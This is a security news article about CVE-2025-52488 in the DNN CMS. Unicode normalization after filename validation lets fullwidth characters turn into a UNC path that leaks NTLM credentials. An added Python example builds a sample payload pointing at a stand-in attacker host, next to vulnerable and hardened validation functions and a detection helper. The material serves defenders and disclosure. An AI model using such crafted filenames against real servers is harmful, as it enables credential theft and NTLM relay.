DNN Vulnerability Let Attackers Steal NTLM Credentials via Unicode Normalization Bypass

CVE-2025-52488 in DNN allows attackers to steal NTLM credentials without requiring user authentication. The vulnerability affects one of the oldest open-source content management systems and demonstrates how defensive coding measures can be circumvented through clever exploitation of Windows and .NET quirks.

DNN validates user-supplied filenames, but these security checks occur before the crucial Utility.ConvertUnicodeChars function. That normalization step converts Unicode characters to ASCII equivalents, effectively bypassing all previously implemented security measures. Specific Unicode characters (U+FF0E, U+FF3C) normalize into dots and backslashes after passing validation, so attackers can construct malicious filenames that appear safe during the initial check but transform into UNC paths after normalization. When processed, such a name becomes \\attacker.com\share\file.jpg, triggering an SMB connection that leaks NTLM credentials to the attacker's Responder server.

This mechanism becomes particularly dangerous when combined with functions like File.Exists, System.Net.HttpRequest, and System.Net.WebClient, which can inadvertently leak NTLM credentials to malicious servers. The pre-authentication nature of the vulnerability makes it especially dangerous: it requires no user credentials to exploit and can compromise domain credentials through NTLM relay attacks. The flaw enables NTLM credential theft affecting enterprises and demonstrates how defensive coding can be circumvented through character encoding.
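As an added example (not DNN's code or the article's), the following Python models the ordering problem described above: a filename check that runs before the Unicode conversion versus one that runs after it, plus a helper a defender can use to flag names whose meaning changes under normalization. It assumes NFKC as a stand-in for Utility.ConvertUnicodeChars and uses a constructed sample filename.

```python
import unicodedata
from typing import Optional

# Fullwidth forms named in the article: U+FF3C and U+FF0E. NFKC maps them to
# ASCII '\' and '.'; NFKC is an assumption standing in for DNN's converter.
FW_BACKSLASH = "\uff3c"
FW_DOT = "\uff0e"
FORBIDDEN = ("\\", "/", "..", ":")


def rejects_path_chars(name: str) -> bool:
    """ASCII-only filename check of the kind the article says runs first."""
    return any(tok in name for tok in FORBIDDEN)


def convert_unicode(name: str) -> str:
    """Late conversion step; NFKC is assumed here, not DNN's own implementation."""
    return unicodedata.normalize("NFKC", name)


def vulnerable_order(name: str) -> Optional[str]:
    """Validate first, normalize afterwards: the ordering the article describes."""
    if rejects_path_chars(name):
        return None
    return convert_unicode(name)


def hardened_order(name: str) -> Optional[str]:
    """Normalize first, validate the canonical form, and require normalization to
    be idempotent so no later pass can reintroduce separators."""
    canon = convert_unicode(name)
    if canon != convert_unicode(canon) or rejects_path_chars(canon):
        return None
    return canon


def normalization_shifts_meaning(name: str) -> bool:
    """Detection helper: true when a name is clean as submitted but gains
    path separators once normalized (a candidate for logging or blocking)."""
    return not rejects_path_chars(name) and rejects_path_chars(convert_unicode(name))


# Constructed sample modelled on the article's UNC example, written with fullwidth characters.
SAMPLE = (f"{FW_BACKSLASH}{FW_BACKSLASH}attacker{FW_DOT}com"
          f"{FW_BACKSLASH}share{FW_BACKSLASH}file{FW_DOT}jpg")

if __name__ == "__main__":
    print(repr(vulnerable_order(SAMPLE)))      # '\\\\attacker.com\\share\\file.jpg'
    print(hardened_order(SAMPLE))              # None
    print(normalization_shifts_meaning(SAMPLE))  # True
```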

This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 08 Jul 2025 16:30:21 +0000

